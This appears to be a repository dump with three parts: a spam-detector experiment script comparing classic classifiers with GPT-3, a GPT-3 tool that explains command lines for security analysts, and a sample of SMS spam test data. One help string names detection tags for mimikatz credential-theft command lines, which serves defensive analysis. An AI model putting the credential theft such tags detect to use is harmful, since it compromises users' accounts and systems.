120 | :param column_label: the column for label data
121 | :param positive_label: the positive label value
122 | :param negative_label: the negative label value
123 | :param fine_tune: True to fine_tune
124 | :param fine_tuned_model: fine_tuned model name
125 | :param fine_tune_context_sample_size: the sample size for fine-tunning prompt data
126 | :param prompt_context_sample_size=3: the sample size for context prompt
127 | :param sleep_time: sleep time in seconds
128 | """
129 | logger.info("evaluate_model_with_train_sample_sizes:{}".format(locals()))
130 |
131 | f1_score_list = []
132 | for train_sample_size in train_sample_size_list:
133 | if train_sample_size > 0:
134 | path_train_data = os.path.join(
135 | path_data_folder, "train_{}.csv".format(train_sample_size))
136 | else:
137 | path_train_data = os.path.join(path_data_folder, "train.csv")
138 | path_test_data = os.path.join(path_data_folder, "test.csv")
139 |
140 | if model_name in ["RandomForest", "LogisticRegression"]:
141 | report_test = evaluate_sklearn_model(
142 | path_train_data=path_train_data,
143 | path_test_data=path_test_data,
144 | model_name=model_name,
145 | max_features=MAX_SKLEARN_ML_FEATURES,
146 | column_text=column_text,
147 | column_label=column_label,
148 | positive_label=positive_label
149 | )
150 | else:
151 | report_test = evaluate_gpt3_model(
152 | path_train_data,
153 | path_test_data=path_test_data,
154 | model_name=model_name,
155 | data_type=data_type,
156 | column_text=column_text,
157 | column_label=column_label,
158 | positive_label=positive_label,
159 | negative_label=negative_label,
160 | fine_tune=fine_tune,
161 | fine_tuned_model=fine_tuned_model,
162 | fine_tune_context_sample_size=fine_tune_context_sample_size,
163 | prompt_context_sample_size=prompt_context_sample_size,
164 | sleep_time=sleep_time
165 | )
166 |
167 | if report_test is not None:
168 | test_f1_score = report_test["weighted avg"]["f1-score"]
169 | report_item = {"train_size": train_sample_size}
170 | report_item.update(
171 | {"test_"+k: v for k, v in report_test["weighted avg"].items()})
172 | f1_score_list.append(report_item)
173 |
174 | logger.info("model_name:{}, train_size:{}, test_f1_score:{}".format(
175 | model_name, train_sample_size, test_f1_score))
176 |
177 | #store the f1 scores
178 | df = pd.DataFrame(f1_score_list)
179 | df.to_csv(path_results_output, index=False)
180 |
181 |
182 | def plot_f1_results(
183 | plot_item_list=[("RandomForest", "orange", "o" ,"../**/results_randomforest.csv")],
184 | path_output="result_f1_plot.pdf"
185 | ):
186 | """
187 | plot f1 results.
188 | :param plot_item_list: a list of plot data items
189 | :param path_output: file path for output image
190 | """
191 | pyplot.clf()
192 |
193 | for label, color, marker, path_pattern in plot_item_list:
194 | f1_list=[]
195 | for path_file in glob.glob(path_pattern, recursive=1):
196 | df = pd.read_csv(path_file)
197 | f1_list.append(df["test_f1-score"])
198 | if len(f1_list) == 0:
199 | continue
200 | x = [str(size) for size in df["train_size"]]
201 |
202 | f1_list = np.array(f1_list)
203 | #the mean f1 values
204 | f1_mean = np.mean(f1_list, axis=0)
205 | #the std f1 values
206 | f1_std = np.std(f1_list, axis=0)
207 | f1_upper = f1_mean + f1_std
208 | f1_lower = f1_mean - f1_std
209 |
210 | pyplot.plot(x, f1_mean, marker=marker, color=color, label=label)
211 | pyplot.fill_between(x, f1_lower, f1_upper, color=color, alpha=.2)
212 |
213 | pyplot.grid()
214 | pyplot.ylabel("F1-score")
215 | pyplot.xlabel("Training sample size")
216 | pyplot.legend(loc="lower right")
217 | pyplot.savefig(path_output)
218 |
219 |
220 | def run_experiments(path_data_folder="spam_data"):
221 | """
222 | run experiments with data sets in the data folder.
223 | :param path_data_folder: folder for the data sets
224 | """
225 | # generate train and test datasets.
226 | generate_datasets(
227 | path_output_folder=path_data_folder,
228 | path_input_tsv_file=os.path.join(
229 | path_data_folder, "SMSSpamCollection"),
230 | column_text="text",
231 | column_label="label",
232 | positive_label="Spam",
233 | #the sample size list for training datasets should be sorted in descending order.
234 | train_sample_size_list=[1024, 512, 32, 8, 2],
235 | test_sample_size=256
236 | )
237 |
238 | # evaluate RandomForest model
239 | path_results_randomforest = os.path.join(
240 | path_data_folder, "results_randomforest.csv")
241 | evaluate_model_with_train_sample_sizes(
242 | path_results_output=path_results_randomforest,
243 | model_name="RandomForest",
244 | path_data_folder=path_data_folder,
245 | #the sample size list for evaluation should be sorted in ascending order.
246 | train_sample_size_list=[2, 8, 32, 512, 1024]
247 | )
248 |
249 | # evaluate LogisticRegression model
250 | path_results_logisticregression = os.path.join(
251 | path_data_folder, "results_logisticregression.csv")
252 | evaluate_model_with_train_sample_sizes(
253 | path_results_output=path_results_logisticregression,
254 | model_name="LogisticRegression",
255 | path_data_folder=path_data_folder,
256 | train_sample_size_list=[2, 8, 32, 512, 1024]
257 | )
258 |
259 | # evaluate GPT-3 few-shot model with few samples of [2, 8, 32]
260 | path_results_gpt3_fewshot = os.path.join(
261 | path_data_folder, "results_gpt3_fewshot.csv")
262 | evaluate_model_with_train_sample_sizes(
263 | path_results_output=path_results_gpt3_fewshot,
264 | model_name="text-davinci-002",
265 | path_data_folder=path_data_folder,
266 | train_sample_size_list=[2, 8, 32],
267 | fine_tune=False
268 | )
269 |
270 | # # evaluate GPT-3 fine-tuning model with a few samples of [512, 1024]
271 | path_results_gpt3_finetune = os.path.join(
272 | path_data_folder, "results_gpt3_finetune.csv")
273 | evaluate_model_with_train_sample_sizes(
274 | path_results_output=path_results_gpt3_finetune,
275 | model_name="davinci",
276 | path_data_folder=path_data_folder,
277 | train_sample_size_list=[512, 1024],
278 | fine_tune=True
279 | )
280 |
281 | #plot f1 results
282 | plot_items = [
283 | #(label, color, mark, path_pattern)
284 | ("GPT3_Fewshot", "blue", "*", path_results_gpt3_fewshot),
285 | ("GPT3_Finetune", "red", "*", path_results_gpt3_finetune),
286 | ("RandomForest", "orange", "o", path_results_randomforest),
287 | ("LogisticRegression", "green", "v", path_results_logisticregression)
288 | ]
289 | plot_f1_results(plot_items, path_output=os.path.join(path_data_folder, "results_f1_plot.pdf"))
290 |
291 |
292 | if __name__ == "__main__":
293 | parser = argparse.ArgumentParser(description="Spam detection")
294 | parser.add_argument(
295 | "--run_type",
296 | help="classify_message or evaluate_approaches",
297 | default="classify_message"
298 | )
299 | parser.add_argument(
300 | "--message",
301 | help="message to be classified",
302 | default=""
303 | )
304 | parser.add_argument(
305 | "--path_train_data",
306 | help="file path for training samples",
307 | default="spam_data/experiment_1/train_2.csv"
308 | )
309 |
310 | parser.add_argument(
311 | "--path_data_folder",
312 | help="file folder for data",
313 | default="spam_data"
314 | )
315 | parser.add_argument(
316 | "--num_experiments",
317 | type=int,
318 | help="number of experiments",
319 | default=5
320 | )
321 | args = parser.parse_args()
322 |
323 | if args.run_type == "classify_message":
324 | classify_message(
325 | message=args.message,
326 | path_train_data=args.path_train_data
327 | )
328 | else:
329 | #run experiments
330 | for ix in range(1, args.num_experiments+1):
331 | path_data_folder = os.path.join(args.path_data_folder, "experiment_{}".format(ix))
332 | logger.info("==== experiment_{}, path_data_folder:{}".format(ix, path_data_folder))
333 | os.makedirs(path_data_folder, exist_ok=True)
334 | path_src_data = os.path.join(args.path_data_folder, "SMSSpamCollection")
335 | path_dest_data = os.path.join(path_data_folder, "SMSSpamCollection")
336 | shutil.copyfile(path_src_data, path_dest_data)
337 | run_experiments(path_data_folder=path_data_folder)
338 |
339 | #plot mean f1 with all experiment results.
340 | plot_items = [
341 | #(label, color, marker, path_pattern)
342 | ("GPT3_Fewshot", "blue", "*", os.path.join(args.path_data_folder, "**", "results_gpt3_fewshot.csv")),
343 | ("GPT3_Finetune", "red", "*", os.path.join(args.path_data_folder, "**", "results_gpt3_finetune.csv")),
344 | ("RandomForest", "orange", "o", os.path.join(args.path_data_folder, "**", "results_randomforest.csv")),
345 | ("LogisticRegression", "green", "v", os.path.join(args.path_data_folder, "**", "results_logisticregression.csv"))
346 | ]
347 | plot_f1_results(plot_items, path_output=os.path.join(args.path_data_folder, "results_mean_f1_plot.pdf"))
348 |
--------------------------------------------------------------------------------
/command_analyzer/command_analyzer.py:
--------------------------------------------------------------------------------
1 | import json
2 | import pandas as pd
3 | import argparse
4 | import logging
5 |
6 | from prompt_data import get_prompt_for_desc_from_cmd_tag
7 | from prompt_data import get_prompt_for_cmd_from_tag_desc
8 | from prompt_data import get_prompt_for_combined_desc
9 | from prompt_data import preprocess_tags_str
10 | from prompt_data import generate_text_list_with_prompt
11 | from similarity import get_sorted_similarity_score_list
12 | from similarity import get_ngrams_bleu_similarity_score
13 | from similarity import get_semantic_similarity_score
14 |
15 |
16 | logging.basicConfig(format="%(asctime)s %(message)s",
17 | datefmt='%Y-%m-%d %H:%M:%S', level=logging.INFO)
18 | logger = logging.getLogger(__name__)
19 |
20 |
21 | MAX_CMD_LEN = 200
22 |
23 | ENGINE_CMD2DESC = "code-davinci-002"
24 | ENGINE_DESC2CMD = "code-davinci-002"
25 | ENGINE_COMBINE_DESC = "text-davinci-002"
26 | ENGINE_EMBEDDINGS = "text-similarity-babbage-001"
27 |
28 | ENGINE_TEMPERATURE = 0.7
29 |
30 |
31 | def generate_desc_list_from_cmd_tag(
32 | cmd,
33 | tags,
34 | include_tag=True,
35 | include_prefix=False,
36 | engine=ENGINE_CMD2DESC,
37 | temperature=0.7,
38 | n=5,
39 | max_cmd_len=MAX_CMD_LEN
40 | ):
41 | """
42 | generates a list of descriptions from the command and tag info.
43 | :param cmd: command line data
44 | :param tags: "," seperated tags data
45 | :param include_tag: True to include tags in prompt
46 | :param include_prefix: True to include support examples in prompt
47 | :param engine: openai engine
48 | :param temperature: temperature to control randomness of engine
49 | :param n: number of engine outputs
50 | :param max_cmd_len: max data length for command line data
51 | """
52 | prompt = get_prompt_for_desc_from_cmd_tag(
53 | cmd, tags, max_cmd_len=max_cmd_len,
54 | include_tag=include_tag, include_prefix=include_prefix)
55 | desc_list = generate_text_list_with_prompt(
56 | prompt, engine=engine, temperature=temperature, n=n)
57 | return desc_list
58 |
59 |
60 | def generate_cmd_list_from_tag_desc(
61 | cmd,
62 | tags,
63 | desc,
64 | include_tag=True,
65 | include_prefix=False,
66 | engine=ENGINE_DESC2CMD,
67 | temperature=0.7,
68 | n=1,
69 | max_cmd_len=MAX_CMD_LEN
70 | ):
71 | """
72 | generates a list of command lines from the description and tag info.
73 | :param cmd: command line data
74 | :param tags: "," seperated tags data
75 | :param desc: description for the command line
76 | :param include_tag: True to include tags in prompt
77 | :param include_prefix: True to include support examples in prompt
78 | :param engine: openai engine
79 | :param temperature: temperature to control randomness of engine
80 | :param n: number of engine outputs
81 | :param max_cmd_len: max data length for command line data
82 | """
83 | first_token_as_cmd = cmd.split()[0]
84 | prompt = get_prompt_for_cmd_from_tag_desc(
85 | tags, desc, first_token_as_cmd, max_cmd_len=max_cmd_len,
86 | include_tag=include_tag, include_prefix=include_prefix)
87 | cmd_list = generate_text_list_with_prompt(
88 | prompt, engine=engine, temperature=temperature, n=n)
89 | return cmd_list
90 |
91 |
92 | def generate_combined_desc_from_cmd_desc(
93 | cmd,
94 | desc1,
95 | desc2,
96 | engine=ENGINE_COMBINE_DESC,
97 | temperature=0.7,
98 | max_cmd_len=MAX_CMD_LEN
99 | ):
100 | """
101 | generates a combined descriptin from two descriptions.
102 | :param cmd: command line data
103 | :param desc1: the first description
104 | :param desc2: the second description
105 | :param engine: openai engine
106 | :param temperature: temperature to control randomness of engine
107 | :param max_cmd_len: max data length for command line data
108 | """
109 | prompt = get_prompt_for_combined_desc(
110 | cmd, desc1, desc2, max_cmd_len=max_cmd_len)
111 | desc = generate_text_list_with_prompt(
112 | prompt, engine=engine, temperature=temperature, n=1)[0]
113 | return desc
114 |
115 |
116 | def generate_sorted_desc_list_from_cmd_tag(
117 | cmd,
118 | tags,
119 | include_tag=True,
120 | include_prefix=False,
121 | weight_desc_score=.0,
122 | weight_tags_score=.0,
123 | desc_size=5,
124 | cmd_size=1,
125 | engine_cmd2desc=ENGINE_CMD2DESC,
126 | engine_desc2cmd=ENGINE_DESC2CMD,
127 | engine_embeddings=ENGINE_EMBEDDINGS,
128 | temperature=ENGINE_TEMPERATURE,
129 | max_cmd_len=MAX_CMD_LEN
130 | ):
131 | """
132 | generates a list of descriptions sorted by similarity scores.
133 | step1. generate a list of descs from cmd and tags
134 | step2. generate a list of cmds from tags and desc
135 | step3. sort descs by similarity scores
136 |
137 | :param cmd: command line data
138 | :param tags: "," seperated tags data
139 | :param include_tag: True to include tags in prompt
140 | :param include_prefix: True to include support examples in prompt
141 | :param weight_desc_score: the weight for description score
142 | :param weight_tags_score: the weight for tags score
143 | :param desc_size: the number of output descriptions
144 | :param cmd_size: the number of output command lines
145 | :param engine_cmd2desc: the engine for command to description
146 | :param engine_desc2cmd: the engine for description to command
147 | :param engine_embeddings: the engine for text embeddings
148 | :param temperature: temperature to control randomness of engine
149 | :param max_cmd_len: max data length for command line data
150 | """
151 | tags = preprocess_tags_str(tags)
152 | logger.info(f"tags={tags}")
153 |
154 | desc_list = generate_desc_list_from_cmd_tag(
155 | cmd, tags, include_tag=include_tag, include_prefix=include_prefix,
156 | engine=engine_cmd2desc, temperature=temperature,
157 | n=desc_size, max_cmd_len=max_cmd_len)
158 | if len(desc_list) == 0:
159 | return []
160 | baseline_description = desc_list[0]
161 |
162 | cmd_first_token = cmd.split()[0]
163 | desc_cmd_list = []
164 | for desc in desc_list:
165 | generated_cmd = generate_cmd_list_from_tag_desc(
166 | cmd, tags, desc, include_tag=include_tag,
167 | include_prefix=include_prefix, n=cmd_size,
168 | engine=engine_desc2cmd, temperature=temperature,
169 | max_cmd_len=max_cmd_len)[0]
170 | #append the cmd_first_token + the first generated text
171 | generated_cmd = cmd_first_token + generated_cmd
172 | desc_cmd_list.append((desc, generated_cmd))
173 | desc_cmd_list = get_sorted_similarity_score_list(
174 | cmd, tags,
175 | desc_cmd_list, engine=engine_embeddings,
176 | weight_desc_score=weight_desc_score,
177 | weight_tags_score=weight_tags_score, max_cmd_len=max_cmd_len)
178 | return desc_cmd_list, baseline_description
179 |
180 |
181 | def generate_descriptions_from_cmd_tags(
182 | cmd,
183 | tags=None,
184 | n=2,
185 | combine_descriptions=True,
186 | engine_cmd2desc=ENGINE_CMD2DESC,
187 | engine_desc2cmd=ENGINE_DESC2CMD,
188 | engine_embeddings=ENGINE_EMBEDDINGS,
189 | engine_combine_desc=ENGINE_COMBINE_DESC,
190 | temperature=ENGINE_TEMPERATURE,
191 | max_cmd_len=MAX_CMD_LEN
192 | ):
193 | """
194 | generates a combined descripotion from a list of descriptions.
195 | :param cmd: command line data
196 | :param tags: "," seperated tags data
197 | :param n: the number of output descriptions
198 | :param combine_descriptions: True to combine two descriptions
199 | :param engine_cmd2desc: the engine for command to description
200 | :param engine_desc2cmd: the engine for description to command
201 | :param engine_embeddings: the engine for text embeddings
202 | :param temperature: temperature to control randomness of engine
203 | :param max_cmd_len: max data length for command line data
204 | """
205 | logger.info("generate_descriptions_from_cmd_tags:{}".format(locals()))
206 |
207 | if tags:
208 | include_tag = 1
209 | weight_desc_score=0.3
210 | weight_tags_score=0.2
211 | else:
212 | include_tag = 0
213 | weight_desc_score=0.5
214 | weight_tags_score=0.0
215 |
216 | desc_cmd_items, baseline_description = generate_sorted_desc_list_from_cmd_tag(
217 | cmd, tags, include_tag=include_tag, include_prefix=1,
218 | weight_desc_score=weight_desc_score, weight_tags_score=weight_tags_score,
219 | desc_size=5, cmd_size=1,
220 | engine_cmd2desc=engine_cmd2desc, engine_desc2cmd=engine_desc2cmd,
221 | engine_embeddings=engine_embeddings, temperature=temperature,
222 | max_cmd_len=max_cmd_len)
223 |
224 | baseline_description = "The command" + baseline_description
225 |
226 | best_candidates = []
227 | first_desc, second_desc = '', ''
228 | for ix,item in enumerate(desc_cmd_items[:n]):
229 | score, _score_code, _score_desc, _score_tags, cmd, generated_cmd, desc = item[:]
230 | candidate_data = {"score":score, "desc":desc, "generated_cmd":generated_cmd}
231 | if ix == 0:
232 | first_desc = desc
233 | else:
234 | second_desc = desc
235 | logger.info(candidate_data)
236 | best_candidates.append(candidate_data)
237 |
238 | if first_desc and second_desc:
239 | if combine_descriptions:
240 | combined_desc = generate_combined_desc_from_cmd_desc(
241 | cmd, first_desc, second_desc,
242 | engine=engine_combine_desc, temperature=temperature,
243 | max_cmd_len=max_cmd_len)
244 | description = "The command" + combined_desc
245 | else:
246 | description = "The command" + first_desc
247 | else:
248 | description = "The command" + first_desc
249 | logger.info("\n"+description+"\n")
250 |
251 | return description, baseline_description, best_candidates
252 |
253 |
254 | def generate_description(
255 | cmd,
256 | tags=None,
257 | combine_descriptions=True,
258 | engine_cmd2desc=ENGINE_CMD2DESC,
259 | engine_desc2cmd=ENGINE_DESC2CMD,
260 | temperature=ENGINE_TEMPERATURE
261 | ):
262 | """
263 | generates a description from a command line and tag info.
264 | :param cmd: command line data
265 | :param tags: "," seperated tags data
266 | :param combine_descriptions: True to combine two descriptions
267 | :param engine_cmd2desc: the engine for command to description
268 | :param engine_desc2cmd: the engine for description to command
269 | :param temperature: temperature to control randomness of engine
270 | """
271 | description, baseline_description, best_candidates = generate_descriptions_from_cmd_tags(
272 | cmd, tags=tags, n=2,
273 | combine_descriptions=combine_descriptions,
274 | engine_cmd2desc=engine_cmd2desc, engine_desc2cmd=engine_desc2cmd,
275 | temperature=temperature
276 | )
277 |
278 | logger.info("cmd:\n{}".format(cmd))
279 | logger.info("tags:\n{}".format(tags))
280 | logger.info("description:\n{}".format(description))
281 | logger.info("baseline_description:\n{}".format(baseline_description))
282 | logger.info("back-translated_cmd:\n{}".format(best_candidates[0]["generated_cmd"]))
283 | return description, baseline_description, best_candidates
284 |
285 |
286 | def evaluate_approaches(
287 | path_output_json,
288 | path_input_json,
289 | engine_cmd2desc=ENGINE_CMD2DESC,
290 | engine_desc2cmd=ENGINE_DESC2CMD,
291 | temperature=ENGINE_TEMPERATURE,
292 | combine_descriptions=True,
293 | offset=0,
294 | limit=0
295 | ):
296 | """
297 | evaluates baseline and back-translation approaches using a test dataset.
298 | :param path_output_json: file path for input data
299 | :param path_input_json: file path for output data
300 | :param cmd: command line data
301 | :param tags: "," seperated tags data
302 | :param engine_cmd2desc: the engine for command to description
303 | :param engine_desc2cmd: the engine for description to command
304 | :param temperature: temperature to control randomness of engine
305 | :param combine_descriptions: True to combine two descriptions
306 | :param offset: the offset of input data for partial testing
307 | :param limit: the limit of input data for partial testing
308 | """
309 | logger.info("evaluate_approaches:{}".format(locals()))
310 |
311 | with open(path_input_json) as fr:
312 | items = json.load(fr)
313 |
314 | if offset>0:
315 | items = items[offset:]
316 | if limit>0:
317 | items = items[:limit]
318 | logger.info("number of items in input file:{}".format(len(items)))
319 |
320 | results = []
321 | for ix, item in enumerate(items):
322 | logger.info("======== {}".format(ix))
323 |
324 | cmd = item["cmd"]
325 | tags = item["tags"]
326 | gold_description = item["gold_reference_description"]
327 |
328 | generated_description, baseline_description, _best_candidates = generate_description(
329 | cmd,
330 | tags=tags,
331 | combine_descriptions=combine_descriptions,
332 | engine_cmd2desc=engine_cmd2desc,
333 | engine_desc2cmd=engine_desc2cmd,
334 | temperature=temperature
335 | )
336 |
337 | item["generated_description"] = generated_description
338 | item["baseline_description"] = baseline_description
339 |
340 | candidate_list = [generated_description, baseline_description]
341 |
342 | ngram_bleu_scores = get_ngrams_bleu_similarity_score(gold_description, candidate_list)
343 | #ngram_bleu_scores_list.append(ngram_bleu_scores)
344 | item["ngram_bleu_scores"] = {
345 | "generated_description_score":ngram_bleu_scores[0], "baseline_description_score":ngram_bleu_scores[1]
346 | }
347 |
348 | semantic_similarity_scores = get_semantic_similarity_score(gold_description, candidate_list, engine=ENGINE_EMBEDDINGS)
349 | #semantic_similarity_scores_list.append(semantic_similarity_scores)
350 | item["semantic_similarity_scores"] = {
351 | "generated_description_score":semantic_similarity_scores[0], "baseline_description_score":semantic_similarity_scores[1]
352 | }
353 |
354 | results.append(item)
355 |
356 | logger.info("cmd:{}".format(cmd))
357 | logger.info("tags:{}".format(tags))
358 | logger.info("gold_description:{}".format(gold_description))
359 | logger.info("generated_description:{}".format(generated_description))
360 | logger.info("baseline_description:{}".format(baseline_description))
361 |
362 | logger.info("ngram_bleu_scores:{}".format(ngram_bleu_scores))
363 | logger.info("semantic_similarity_scores:{}".format(semantic_similarity_scores))
364 |
365 | #save the outputs
366 | with open(path_output_json, "wt") as fw:
367 | json.dump(results, fw, indent=2)
368 |
369 | #store the mean and std values for similarity scores
370 | df_bleu = pd.DataFrame([item["ngram_bleu_scores"] for item in results]).add_prefix("ngram_bleu_")
371 | df_semantic = pd.DataFrame([item["semantic_similarity_scores"] for item in results]).add_prefix("semantic_similarity_")
372 | df = df_bleu.join(df_semantic)
373 | df_mean_std = df.agg(["mean", "std"])
374 | logger.info("df_mean_std:{}".format(df_mean_std))
375 | path_output_score_csv = path_output_json + "_scores.csv"
376 | df_mean_std.to_csv(path_output_score_csv)
377 |
378 | return results
379 |
380 |
381 | if __name__ == "__main__":
382 | parser = argparse.ArgumentParser(description="Command to description")
383 |
384 | parser.add_argument(
385 | "--run_type",
386 | help="generate_desc or evaluate_approaches",
387 | default="generate_desc"
388 | )
389 | parser.add_argument(
390 | "--cmd",
391 | help="command line data",
392 | )
393 | parser.add_argument(
394 | "--tags",
395 | help="',' seperated tags for example, win_mimikatz_command_line,win_suspicious_execution_path ",
396 | default=""
397 | )
398 | parser.add_argument(
399 | "--combine_descriptions",
400 | action="store_true",
401 | dest="combine_descriptions",
402 | help="to combine two descriptions as the final description",
403 | default=True
404 | )
405 | parser.add_argument(
406 | "--no_combine_descriptions",
407 | action="store_false",
408 | dest="combine_descriptions",
409 | help="not to combine two descriptions as the final description",
410 | default=False
411 | )
412 |
413 | parser.add_argument(
414 | "--engine_cmd2desc",
415 | help="gpt3 model for command to description",
416 | default=ENGINE_CMD2DESC
417 | )
418 | parser.add_argument(
419 | "--engine_desc2cmd",
420 | help="gpt3 model for description to command",
421 | default=ENGINE_DESC2CMD
422 | )
423 | parser.add_argument(
424 | "--temperature",
425 | type=float,
426 | help="temperature ",
427 | default=ENGINE_TEMPERATURE
428 | )
429 |
430 | parser.add_argument(
431 | "--path_output_json",
432 | help="path for output json file",
433 | )
434 | parser.add_argument(
435 | "--path_input_json",
436 | help="path for input json file",
437 | )
438 | parser.add_argument(
439 | "--offset",
440 | type=int,
441 | help="path for input json file",
442 | default=0
443 | )
444 | parser.add_argument(
445 | "--limit",
446 | type=int,
447 | help="path for input json file",
448 | default=0
449 | )
450 |
451 | args = parser.parse_args()
452 | if args.run_type == "generate_desc":
453 | generate_description(
454 | args.cmd,
455 | args.tags,
456 | args.combine_descriptions,
457 | engine_cmd2desc=args.engine_cmd2desc,
458 | engine_desc2cmd=args.engine_desc2cmd
459 | )
460 | else:
461 | evaluate_approaches(
462 | args.path_output_json,
463 | args.path_input_json,
464 | engine_cmd2desc=args.engine_cmd2desc,
465 | engine_desc2cmd=args.engine_desc2cmd,
466 | temperature=args.temperature,
467 | combine_descriptions=args.combine_descriptions,
468 | offset=args.offset,
469 | limit=args.limit
470 | )
471 |
--------------------------------------------------------------------------------
/spam_detector/spam_data/experiment_1/test.csv:
--------------------------------------------------------------------------------
1 | label text
2 | Ham LMAO where's your fish memory when I need it?
3 | Ham Got meh... When?
4 | Ham You should change your fb to jaykwon thuglyfe falconerf
5 | Ham Not sure yet, still trying to get a hold of him
6 | Ham Chk in ur belovd ms dict
7 | Ham Aight I'll grab something to eat too, text me when you're back at mu
8 | Ham Give me a sec to think think about it
9 | Ham Maybe you should find something else to do instead???
10 | Ham She.s good. She was wondering if you wont say hi but she.s smiling now. So how are you coping with the long distance
11 | Ham I am thinking of going down to reg for pract lessons.. Flung my advance.. Haha wat time u going?
12 | Ham What Today-sunday..sunday is holiday..so no work..
13 | Ham Fuck babe, I miss you sooooo much !! I wish you were here to sleep with me ... My bed is so lonely ... I go now, to sleep ... To dream of you, my love ...
14 | Spam Free entry in 2 a wkly comp to win FA Cup final tkts 21st May 2005. Text FA to 87121 to receive entry question(std txt rate)T&C's apply 08452810075over18's
15 | Ham Kay... Since we are out already
16 | Ham hows my favourite person today? r u workin hard? couldn't sleep again last nite nearly rang u at 4.30
17 | Ham Yeh. Indians was nice. Tho it did kane me off a bit he he. We shud go out 4 a drink sometime soon. Mite hav 2 go 2 da works 4 a laugh soon. Love Pete x x
18 | Ham I want <#> rs da:)do you have it?
19 | Ham No, but you told me you were going, before you got drunk!
20 | Ham It's cool, let me know before it kicks off around <#> , I'll be out and about all day
21 | Ham When you just put in the + sign, choose my number and the pin will show. Right?
22 | Ham Lol u still feeling sick?
23 | Spam 22 days to kick off! For Euro2004 U will be kept up to date with the latest news and results daily. To be removed send GET TXT STOP to 83222
24 | Ham HIYA STU WOT U UP 2.IM IN SO MUCH TRUBLE AT HOME AT MOMENT EVONE HATES ME EVEN U! WOT THE HELL AV I DONE NOW? Y WONT U JUST TELL ME TEXT BCK PLEASE LUV DAN
25 | Ham I wanna watch that movie
26 | Ham You will be in the place of that man
27 | Ham No da. . Vijay going to talk in jaya tv
28 | Ham Whatsup there. Dont u want to sleep
29 | Ham Gud mrng dear hav a nice day
30 | Ham Yar but they say got some error.
31 | Ham Yup i thk they r e teacher said that will make my face look longer. Darren ask me not 2 cut too short.
32 | Ham Re your call; You didn't see my facebook huh?
33 | Ham You are not bothering me but you have to trust my answers. Pls.
34 | Ham Of cos can lar i'm not so ba dao ok... 1 pm lor... Y u never ask where we go ah... I said u would ask on fri but he said u will ask today...
35 | Ham Yeah, in fact he just asked if we needed anything like an hour ago. When and how much?
36 | Ham Wat r u doing?
37 | Ham Is it your yahoo boys that bring in the perf? Or legal.
38 | Ham He also knows about lunch menu only da. . I know
39 | Ham HEY DAS COOL... IKNOW ALL 2 WELLDA PERIL OF STUDENTFINANCIAL CRISIS!SPK 2 U L8R.
40 | Ham K actually can you guys meet me at the sunoco on howard? It should be right on the way
41 | Ham Nope. Meanwhile she talk say make i greet you.
42 | Ham How's it going? Got any exciting karaoke type activities planned? I'm debating whether to play football this eve. Feeling lazy though.
43 | Ham "Storming msg: Wen u lift d phne, u say ""HELLO"" Do u knw wt is d real meaning of HELLO?? . . . It's d name of a girl..! . . . Yes.. And u knw who is dat girl?? ""Margaret Hello"" She is d girlfrnd f Grah"
44 | Ham Here got ur favorite oyster... N got my favorite sashimi... Ok lar i dun say already... Wait ur stomach start rumbling...
45 | Ham Dear where you. Call me
46 | Spam You have an important customer service announcement. Call FREEPHONE 0800 542 0825 now!
47 | Ham I dont know oh. Hopefully this month.
48 | Ham Yeah if we do have to get a random dude we need to change our info sheets to PARTY <#> /7 NEVER STUDY just to be safe
49 | Spam Babe: U want me dont u baby! Im nasty and have a thing 4 filthyguys. Fancy a rude time with a sexy bitch. How about we go slo n hard! Txt XXX SLO(4msgs)
50 | Ham Hahaha..use your brain dear
51 | Ham I‘ll have a look at the frying pan in case it‘s cheap or a book perhaps. No that‘s silly a frying pan isn‘t likely to be a book
52 | Ham Nt only for driving even for many reasons she is called BBD..thts it chikku, then hw abt dvg cold..heard tht vinobanagar violence hw is the condition..and hw ru ? Any problem?
53 | Ham Hey sathya till now we dint meet not even a single time then how can i saw the situation sathya.
54 | Ham YO YO YO BYATCH WHASSUP?
55 | Ham Tell them u have a headache and just want to use 1 hour of sick time.
56 | Ham I told her I had a Dr appt next week. She thinks I'm gonna die. I told her its just a check. Nothing to be worried about. But she didn't listen.
57 | Ham I know dat feelin had it with Pete! Wuld get with em , nuther place nuther time mayb?
58 | Ham Don‘t give a flying monkeys wot they think and I certainly don‘t mind. Any friend of mine and all that!
59 | Ham Oh all have to come ah?
60 | Ham I want to go to perumbavoor
61 | Ham Fwiw the reason I'm only around when it's time to smoke is that because of gas I can only afford to be around when someone tells me to be and that apparently only happens when somebody wants to light
62 | Ham I calls you later. Afternoon onwords mtnl service get problem in south mumbai. I can hear you but you cann't listen me.
63 | Ham "Storming msg: Wen u lift d phne, u say ""HELLO"" Do u knw wt is d real meaning of HELLO?? . . . It's d name of a girl..! . . . Yes.. And u knw who is dat girl?? ""Margaret Hello"" She is d girlfrnd f Grah"
64 | Ham It's ok, at least armand's still around
65 | Ham Where can download clear movies. Dvd copies.
66 | Ham I'm always looking for an excuse to be in the city.
67 | Ham Nah man, my car is meant to be crammed full of people
68 | Ham Just taste fish curry :-P
69 | Ham Pls give her prometazine syrup. 5mls then <#> mins later feed.
70 | Ham Good afternoon, babe. How goes that day ? Any job prospects yet ? I miss you, my love ... *sighs* ... :-(
71 | Ham Omg how did u know what I ate?
72 | Ham I HAVE A DATE ON SUNDAY WITH WILL!!
73 | Ham cool. We will have fun practicing making babies!
74 | Spam For ur chance to win a £250 wkly shopping spree TXT: SHOP to 80878. T's&C's www.txt-2-shop.com custcare 08715705022, 1x150p/wk
75 | Spam Camera - You are awarded a SiPix Digital Camera! call 09061221066 fromm landline. Delivery within 28 days.
76 | Ham Do u ever get a song stuck in your head for no reason and it won't go away til u listen to it like 5 times?
77 | Ham So how are you really. What are you up to. How's the masters. And so on.
78 | Ham THANX4 TODAY CER IT WAS NICE 2 CATCH UP BUT WE AVE 2 FIND MORE TIME MORE OFTEN OH WELL TAKE CARE C U SOON.C
79 | Ham Nothing. Can...
80 | Ham G wants to know where the fuck you are
81 | Ham I like dis sweater fr mango but no more my size already so irritating.
82 | Ham No b4 Thursday
83 | Ham Anything lor. Juz both of us lor.
84 | Spam Someone U know has asked our dating service 2 contact you! Cant Guess who? CALL 09058091854 NOW all will be revealed. PO BOX385 M6 6WU
85 | Ham I cant pick the phone right now. Pls send a message
86 | Ham She said,'' do u mind if I go into the bedroom for a minute ? '' ''OK'', I sed in a sexy mood. She came out 5 minuts latr wid a cake...n My Wife,
87 | Ham There is a first time for everything :)
88 | Ham * Am on a train back from northampton so i'm afraid not!
89 | Ham Hi dear we saw dear. We both are happy. Where you my battery is low
90 | Ham Since when, which side, any fever, any vomitin.
